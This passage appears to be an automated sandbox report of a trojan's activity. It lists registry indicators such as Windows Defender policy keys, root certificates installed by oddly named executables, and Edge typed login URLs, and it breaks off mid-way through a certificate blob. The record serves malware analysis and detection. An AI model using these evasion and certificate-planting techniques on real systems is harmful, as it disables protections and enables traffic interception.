Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}User	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "1011"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "75"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 612aa551e541d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "111"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 1d24df8b702cd701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 00716264e741d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedHeight = "600"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "90"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Oy3L2GjKns.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	19EE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	SHyqaefepynae.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b30190603550